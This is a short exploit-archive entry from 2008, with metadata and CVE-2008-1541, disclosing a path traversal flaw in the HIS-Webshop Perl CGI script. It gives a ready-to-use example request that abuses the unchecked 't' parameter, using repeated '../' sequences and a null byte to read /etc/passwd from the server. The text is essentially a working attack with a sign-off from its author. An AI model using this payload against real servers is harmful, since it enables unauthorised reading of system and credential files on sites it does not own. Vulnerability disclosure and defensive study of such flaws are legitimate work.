Author: Zero X type: webapps platform: cgi port: date_added: 2008-03-23 date_updated: verified: 1 codes: OSVDB-43744;CVE-2008-1541 tags: aliases: screenshot_url: application_url:
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 << Greetz Zero X >> # milw0rm.com [2008-03-24]